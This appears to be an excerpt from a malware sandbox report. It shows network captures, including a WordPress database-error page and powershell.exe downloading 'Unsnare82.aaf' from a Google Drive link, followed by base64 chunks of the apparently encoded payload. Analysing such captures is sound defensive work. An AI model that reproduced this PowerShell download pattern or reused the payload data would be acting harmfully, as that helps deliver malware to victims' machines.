                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:16:11.996256113 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:16:11.996269941 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549705173.194.219.1384436784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-04-18 19:14:07 UTC215OUTGET /uc?export=download&id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKV HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Host: drive.google.com
                                                                              Connection: Keep-Alive
                                                                              2024-04-18 19:14:07 UTC1582INHTTP/1.1 303 See Other
                                                                              Content-Type: application/binary
                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                              Pragma: no-cache
                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                              Date: Thu, 18 Apr 2024 19:14:07 GMT
                                                                              Location: https://drive.usercontent.google.com/download?id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKV&export=download
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                              Content-Security-Policy: script-src 'nonce-Q6xLE2tOOGINNTdFydP4KQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Server: ESF
                                                                              Content-Length: 0
                                                                              X-XSS-Protection: 0
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              X-Content-Type-Options: nosniff
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.549706173.194.219.1324436784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-04-18 19:14:07 UTC233OUTGET /download?id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKV&export=download HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Host: drive.usercontent.google.com
                                                                              Connection: Keep-Alive
                                                                              2024-04-18 19:14:08 UTC4745INHTTP/1.1 200 OK
                                                                              X-GUploader-UploadID: ABPtcPqRsuOxqtKiMdmDch-WYATnCWzFugZacDFkzBmYqTyVzujfj1HhRd5hAc1D-Ngyxl2NP8U
                                                                              Content-Type: application/octet-stream
                                                                              Content-Security-Policy: sandbox
                                                                              Content-Security-Policy: default-src 'none'
                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                              X-Content-Security-Policy: sandbox
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                              Cross-Origin-Resource-Policy: same-site
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Disposition: attachment; filename="Unsnare82.aaf"
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Credentials: false
                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 474260
                                                                              Last-Modified: Mon, 15 Apr 2024 21:17:58 GMT
                                                                              Date: Thu, 18 Apr 2024 19:14:08 GMT
                                                                              Expires: Thu, 18 Apr 2024 19:14:08 GMT
                                                                              Cache-Control: private, max-age=0
                                                                              X-Goog-Hash: crc32c=5BTjEA==
                                                                              Server: UploadServer
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close
                                                                              2024-04-18 19:14:08 UTC4745INData Raw: 36 77 4a 76 44 65 73 43 57 61 2b 37 58 68 4d 61 41 48 45 42 6d 33 45 42 6d 77 4e 63 4a 41 54 72 41 72 57 55 63 51 47 62 75 63 71 6d 7a 45 4e 78 41 5a 76 72 41 71 42 58 67 66 45 68 7a 52 64 67 63 51 47 62 63 51 47 62 67 65 6e 72 61 39 73 6a 36 77 49 49 7a 58 45 42 6d 33 45 42 6d 2b 73 43 53 36 53 36 48 73 4f 2f 74 4f 73 43 6d 2b 68 78 41 5a 76 72 41 70 64 44 63 51 47 62 4d 63 72 72 41 75 6c 6d 63 51 47 62 69 52 51 4c 63 51 47 62 36 77 49 4e 72 74 48 69 63 51 47 62 36 77 49 74 6b 59 50 42 42 4f 73 43 33 58 66 72 41 73 65 48 67 66 6c 69 7a 32 77 43 66 4d 72 72 41 69 70 48 63 51 47 62 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 36 77 4a 57 63 65 73 43 66 43 36 42 77 31 41 52 74 77 48 72 41 6b 75 7a 63 51 47 62 75 6b 6b 37 6b 35 31 78 41 5a 74 78 41 5a 75
                                                                              Data Ascii: 6wJvDesCWa+7XhMaAHEBm3EBmwNcJATrArWUcQGbucqmzENxAZvrAqBXgfEhzRdgcQGbcQGbgenra9sj6wIIzXEBm3EBm+sCS6S6HsO/tOsCm+hxAZvrApdDcQGbMcrrAulmcQGbiRQLcQGb6wINrtHicQGb6wItkYPBBOsC3XfrAseHgfliz2wCfMrrAipHcQGbi0QkBHEBm3EBm4nD6wJWcesCfC6Bw1ARtwHrAkuzcQGbukk7k51xAZtxAZu
                                                                              2024-04-18 19:14:08 UTC4745INData Raw: 71 47 58 73 71 31 69 6c 2b 30 33 64 68 66 64 79 35 35 6b 71 47 43 71 44 64 32 72 51 74 39 6e 4b 62 44 4e 39 52 7a 35 48 30 4c 32 61 70 34 45 58 34 5a 64 41 53 31 2b 6a 5a 6d 57 79 68 50 4a 53 63 63 56 37 44 4c 54 68 4c 71 30 49 53 6c 6c 32 77 71 47 33 6a 79 35 79 34 33 63 4b 69 74 6c 77 30 68 6f 70 52 39 71 67 38 31 34 54 4e 4e 6c 38 2f 59 79 50 42 69 37 37 57 33 52 34 6d 46 35 43 43 4d 4a 37 69 42 72 69 31 43 4c 4e 43 4b 67 6c 6f 76 52 38 31 76 46 56 53 4c 72 6f 50 44 72 63 2f 5a 35 33 6a 49 66 39 57 71 6c 59 73 75 57 50 42 7a 68 52 42 31 58 38 61 2f 64 62 37 71 38 56 39 4b 7a 76 6d 4e 67 35 48 38 77 36 33 47 33 69 71 6c 79 75 50 52 71 67 70 70 64 55 68 5a 6c 77 6b 4d 61 41 5a 4e 69 65 6a 5a 30 6f 30 6c 6d 68 51 58 31 73 72 69 30 67 67 41 59 36 69 41 41
                                                                              Data Ascii: qGXsq1il+03dhfdy55kqGCqDd2rQt9nKbDN9Rz5H0L2ap4EX4ZdAS1+jZmWyhPJSccV7DLThLq0ISll2wqG3jy5y43cKitlw0hopR9qg814TNNl8/YyPBi77W3R4mF5CCMJ7iBri1CLNCKglovR81vFVSLroPDrc/Z53jIf9WqlYsuWPBzhRB1X8a/db7q8V9KzvmNg5H8w63G3iqlyuPRqgppdUhZlwkMaAZNiejZ0o0lmhQX1sri0ggAY6iAA
                                                                              2024-04-18 19:14:08 UTC465INData Raw: 51 66 6c 49 6d 43 4a 77 6e 76 30 53 50 72 52 51 64 62 6e 33 32 50 4b 55 70 32 68 52 57 68 4b 4c 30 2b 46 46 32 51 48 4d 67 36 2b 2b 54 75 33 79 79 4b 4b 53 45 6f 6e 55 56 35 46 59 33 55 33 71 68 76 6a 64 4d 39 78 6c 4a 58 38 58 51 33 76 4a 4e 6f 52 43 46 6a 31 41 68 6c 67 66 54 58 42 59 4c 78 66 76 70 68 4b 75 6c 78 35 47 42 53 44 54 77 50 7a 66 41 56 4e 52 70 67 6d 62 41 61 65 66 31 56 30 76 41 56 51 64 6f 36 68 6d 4a 33 2b 41 63 34 34 4f 79 43 74 42 49 4b 37 43 30 48 38 57 45 47 6b 6e 6b 68 6d 42 59 52 65 58 7a 7a 59 44 6e 55 76 43 2f 64 7a 54 39 33 49 37 7a 57 77 32 44 4d 73 50 55 73 61 4f 52 77 46 47 58 72 63 65 51 78 36 33 48 6b 4d 65 74 78 35 41 4a 30 47 35 4d 57 4f 57 52 69 32 7a 58 54 62 71 34 4b 59 31 64 50 71 36 39 42 39 66 7a 6e 4d 49 6b 4b 2f
                                                                              Data Ascii: QflImCJwnv0SPrRQdbn32PKUp2hRWhKL0+FF2QHMg6++Tu3yyKKSEonUV5FY3U3qhvjdM9xlJX8XQ3vJNoRCFj1AhlgfTXBYLxfvphKulx5GBSDTwPzfAVNRpgmbAaef1V0vAVQdo6hmJ3+Ac44OyCtBIK7C0H8WEGknkhmBYReXzzYDnUvC/dzT93I7zWw2DMsPUsaORwFGXrceQx63HkMetx5AJ0G5MWOWRi2zXTbq4KY1dPq69B9fznMIkK/
                                                                              2024-04-18 19:14:08 UTC1255INData Raw: 42 6d 6f 2b 32 30 77 38 52 58 36 4d 67 57 70 43 71 6e 4e 42 4c 59 69 38 68 73 71 43 2f 52 4e 33 51 41 70 72 70 66 6c 5a 33 48 6f 4d 45 35 7a 6f 66 62 31 42 30 49 37 54 77 46 57 42 32 50 42 42 6e 56 62 46 36 76 76 2f 77 45 6f 75 45 7a 68 47 77 48 57 5a 71 69 62 4c 77 45 71 30 6e 6e 70 65 77 4c 58 36 70 71 64 38 69 65 4c 67 49 63 4e 65 73 62 36 71 55 46 58 76 68 79 37 7a 46 54 4f 30 6d 4c 4c 77 57 72 56 74 62 7a 38 4d 36 78 49 4b 31 68 6c 57 51 32 6d 58 54 6f 75 58 46 71 57 47 6d 44 34 37 48 39 2b 39 6f 79 6a 79 56 72 66 74 2f 7a 6b 6b 6c 61 74 4b 70 75 76 32 52 71 32 53 33 2b 59 71 4b 79 6c 54 6b 47 6f 46 43 78 74 4f 6c 67 34 66 53 5a 48 4e 53 6b 45 55 6c 48 4f 68 31 71 75 5a 76 51 51 76 4e 78 6f 74 67 32 41 32 39 6e 44 7a 4d 4f 32 34 4f 65 41 69 62 38 42
                                                                              Data Ascii: Bmo+20w8RX6MgWpCqnNBLYi8hsqC/RN3QAprpflZ3HoME5zofb1B0I7TwFWB2PBBnVbF6vv/wEouEzhGwHWZqibLwEq0nnpewLX6pqd8ieLgIcNesb6qUFXvhy7zFTO0mLLwWrVtbz8M6xIK1hlWQ2mXTouXFqWGmD47H9+9oyjyVrft/zkklatKpuv2Rq2S3+YqKylTkGoFCxtOlg4fSZHNSkEUlHOh1quZvQQvNxotg2A29nDzMO24OeAib8B
                                                                              2024-04-18 19:14:08 UTC1255INData Raw: 74 6e 5a 63 42 2b 77 36 31 68 61 70 67 52 41 73 38 4f 74 36 31 69 6b 75 30 36 64 76 51 36 52 63 6d 4a 47 5a 54 61 2b 49 72 75 39 57 41 37 66 30 2f 70 78 6f 42 68 62 59 52 71 61 66 6b 6c 49 4d 63 49 41 62 34 41 66 30 74 36 63 6c 30 57 62 4c 38 43 48 47 70 76 6e 62 32 36 64 6c 6e 6c 4d 65 73 69 58 78 77 65 74 68 75 77 47 50 69 53 75 2b 6a 77 4a 32 32 57 77 2b 64 6a 64 2f 67 47 4d 50 48 73 33 63 75 59 66 5a 47 76 62 56 41 35 4b 79 31 54 65 74 61 72 62 53 34 53 35 51 46 62 6a 5a 70 52 6b 64 6a 55 6c 4a 37 6d 37 61 35 53 53 7a 62 52 54 5a 32 64 6f 32 48 68 73 66 51 2f 61 72 76 4a 63 53 4c 35 4f 74 46 6d 53 4d 2b 48 42 43 6c 66 53 42 6c 69 65 65 44 79 74 68 68 34 62 4d 66 70 4b 53 44 59 36 61 6b 47 45 59 6f 76 5a 69 77 57 61 48 67 6a 57 47 6a 67 64 64 75 70 35
                                                                              Data Ascii: tnZcB+w61hapgRAs8Ot61iku06dvQ6RcmJGZTa+Iru9WA7f0/pxoBhbYRqafklIMcIAb4Af0t6cl0WbL8CHGpvnb26dlnlMesiXxwethuwGPiSu+jwJ22Ww+djd/gGMPHs3cuYfZGvbVA5Ky1TetarbS4S5QFbjZpRkdjUlJ7m7a5SSzbRTZ2do2HhsfQ/arvJcSL5OtFmSM+HBClfSBlieeDythh4bMfpKSDY6akGEYovZiwWaHgjWGjgddup5
                                                                              2024-04-18 19:14:08 UTC1255INData Raw: 6d 6b 45 73 7a 2f 79 33 32 4a 68 6d 39 53 39 35 70 75 38 6b 44 69 31 33 6f 33 2b 33 77 51 68 5a 65 2b 66 57 78 6b 37 42 41 64 53 45 72 58 79 77 6a 69 65 57 31 64 34 34 77 41 75 6b 73 73 2b 54 58 52 2f 7a 4c 66 4e 48 62 50 77 30 42 57 4e 4d 63 77 6f 4a 30 68 62 57 59 34 45 34 5a 55 55 37 4f 39 37 48 33 6c 33 48 66 61 73 37 55 45 4e 6b 37 65 71 43 4e 47 36 6d 34 7a 57 71 69 58 66 77 65 55 33 46 6d 73 74 69 2f 6f 68 58 43 39 45 49 62 73 45 64 46 4e 42 75 64 36 37 6e 38 51 38 2b 50 53 6f 50 67 69 68 4d 38 48 33 68 53 47 49 74 48 6e 58 39 31 35 46 68 69 48 77 6b 51 35 2f 65 37 7a 4f 6e 6c 58 72 4d 43 39 4a 35 44 48 72 63 65 51 78 36 33 48 6b 4d 65 74 68 71 2f 6f 70 43 30 69 34 62 6d 72 6d 4d 65 74 2b 35 4f 35 66 63 65 51 78 36 33 48 6b 4d 65 74 78 35 44 48 61
                                                                              Data Ascii: mkEsz/y32Jhm9S95pu8kDi13o3+3wQhZe+fWxk7BAdSErXywjieW1d44wAukss+TXR/zLfNHbPw0BWNMcwoJ0hbWY4E4ZUU7O97H3l3Hfas7UENk7eqCNG6m4zWqiXfweU3Fmsti/ohXC9EIbsEdFNBud67n8Q8+PSoPgihM8H3hSGItHnX915FhiHwkQ5/e7zOnlXrMC9J5DHrceQx63HkMethq/opC0i4bmrmMet+5O5fceQx63HkMetx5DHa
                                                                              2024-04-18 19:14:09 UTC1255INData Raw: 4d 65 74 78 35 44 48 72 52 6c 6c 4e 46 77 71 7a 35 68 51 69 47 76 68 71 2b 66 44 47 69 73 6e 5a 48 4a 4a 69 48 4d 34 6a 4b 6e 65 51 67 62 35 65 32 30 69 76 76 78 62 6b 74 74 59 67 36 33 48 6b 4d 65 74 78 35 44 48 72 63 65 51 64 61 78 62 59 37 44 55 74 76 64 63 4a 32 77 6b 78 44 42 52 4f 48 79 5a 57 36 53 77 70 70 34 50 66 66 69 4a 76 72 43 74 77 35 44 46 69 37 4c 38 7a 36 33 46 66 52 4a 35 69 63 4c 41 59 6d 52 30 72 76 76 41 50 59 2f 31 48 4f 66 32 55 4a 43 48 62 38 4c 41 63 53 49 4f 77 78 46 78 30 5a 4d 46 77 4b 70 50 7a 59 36 4b 4f 4f 35 57 30 34 6f 41 38 76 5a 78 56 73 41 41 36 6b 75 49 49 76 52 39 43 41 73 78 57 4a 35 48 45 55 57 6a 49 55 45 38 63 77 78 78 67 79 30 49 4e 57 4c 77 4a 66 7a 41 47 50 63 69 69 41 5a 6f 31 65 46 5a 2f 47 30 4c 30 52 51 73
                                                                              Data Ascii: Metx5DHrRllNFwqz5hQiGvhq+fDGisnZHJJiHM4jKneQgb5e20ivvxbkttYg63HkMetx5DHrceQdaxbY7DUtvdcJ2wkxDBROHyZW6Swpp4PffiJvrCtw5DFi7L8z63FfRJ5icLAYmR0rvvAPY/1HOf2UJCHb8LAcSIOwxFx0ZMFwKpPzY6KOO5W04oA8vZxVsAA6kuIIvR9CAsxWJ5HEUWjIUE8cwxxgy0INWLwJfzAGPciiAZo1eFZ/G0L0RQs
                                                                              2024-04-18 19:14:09 UTC1255INData Raw: 6b 55 74 69 77 47 76 6f 4a 2f 47 48 77 46 57 44 49 6e 31 4a 68 64 2f 67 45 4d 4f 50 73 33 66 47 62 5a 73 58 66 68 44 31 62 79 50 53 44 71 34 76 6f 42 46 6b 54 71 68 4d 38 77 30 51 70 54 57 51 51 6a 69 54 5a 70 35 35 4a 65 4b 69 79 37 66 34 67 68 47 4f 78 46 70 53 38 74 53 45 6f 33 37 54 77 63 2b 51 78 35 50 7a 57 4d 75 74 78 62 61 54 6b 63 2b 51 78 55 53 33 68 55 78 78 2b 35 63 43 66 63 65 51 78 36 33 48 6b 4d 65 74 78 35 44 48 45 76 69 49 78 63 50 51 68 35 44 4f 37 6b 52 47 38 78 54 51 70 48 44 63 56 53 68 55 4c 6b 6c 34 6b 37 50 6d 77 47 64 65 67 6a 52 76 77 46 6b 6d 44 59 36 47 77 41 66 50 4e 2f 61 6d 39 74 69 6b 32 2b 39 5a 56 49 4a 57 4a 44 75 65 2b 35 32 33 78 38 73 66 75 48 36 78 67 49 56 39 6c 4a 42 66 39 41 78 59 57 75 62 31 6d 50 5a 61 6d 76 43
                                                                              Data Ascii: kUtiwGvoJ/GHwFWDIn1Jhd/gEMOPs3fGbZsXfhD1byPSDq4voBFkTqhM8w0QpTWQQjiTZp55JeKiy7f4ghGOxFpS8tSEo37Twc+Qx5PzWMutxbaTkc+QxUS3hUxx+5cCfceQx63HkMetx5DHEviIxcPQh5DO7kRG8xTQpHDcVShULkl4k7PmwGdegjRvwFkmDY6GwAfPN/am9tik2+9ZVIJWJDue+523x8sfuH6xgIV9lJBf9AxYWub1mPZamvC
